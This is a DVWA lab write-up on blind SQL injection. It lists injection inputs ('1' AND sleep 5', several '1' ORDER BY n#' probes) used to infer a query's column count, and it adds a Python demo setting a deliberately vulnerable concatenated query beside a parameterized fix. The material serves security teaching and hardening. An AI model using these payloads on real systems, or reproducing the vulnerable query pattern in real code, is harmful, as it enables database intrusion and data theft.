SQL Injection (Blind)
Objective
Find the version of the SQL database software through a blind SQL attack
Security Level: Low
The SQL query uses raw input that is directly controlled by the attacker. All they need to do is escape the query, and they are then able to execute any SQL query they wish. Spoiler: ?id=1' AND sleep 5&Submit=Submit.
Let's check if user ID 1 exists.
We can now provide the following inputs to figure out the number of columns the query returns.
1' ORDER BY 1#
1' ORDER BY 2#
1' ORDER BY 3#
When we enter the third input, we get a blank screen. ORDER BY with a position higher than the number of selected columns makes the query fail, so this means that the query returns two columns.
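The behaviour described above, reproduced as an added example that is not part of the original write-up or of DVWA's code: a lookup built by string concatenation next to a parameterized one. It assumes an in-memory SQLite database standing in for the MySQL backend, so the page's inputs use `-- ` instead of `#` as the comment marker; the table layout and function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data: a minimal stand-in for the application's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
               "first_name TEXT, last_name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'admin', 'constructed')")
    return db

def page_state(run_query):
    # A blind page shows only three states: exists, missing, or a blank screen on error.
    try:
        rows = run_query()
    except sqlite3.Error:
        return "blank"
    return "exists" if rows else "missing"

def lookup_vulnerable(db, user_id):
    # Raw input concatenated into the statement: the quote in the input ends
    # the string literal and the remainder is parsed as SQL.
    query = ("SELECT first_name, last_name FROM users "
             "WHERE user_id = '" + user_id + "'")
    return page_state(lambda: db.execute(query).fetchall())

def lookup_hardened(db, user_id):
    # Bound parameter: the whole input is compared as a value, never parsed as SQL.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return page_state(lambda: db.execute(query, (user_id,)).fetchall())

# The page's three inputs, with the comment marker adapted for SQLite.
PAGE_INPUTS = ["1' ORDER BY 1-- ", "1' ORDER BY 2-- ", "1' ORDER BY 3-- "]

def compare(db):
    # Map each input to (vulnerable page state, hardened page state).
    return {p: (lookup_vulnerable(db, p), lookup_hardened(db, p))
            for p in PAGE_INPUTS}

if __name__ == "__main__":
    db = make_db()
    print("1 ->", lookup_vulnerable(db, "1"), "/", lookup_hardened(db, "1"))
    for payload, states in compare(db).items():
        print(repr(payload), "->", states)
```

With the bound parameter, all three inputs land in the same "missing" state, so the page no longer leaks the column count through the difference between a normal response and a blank one.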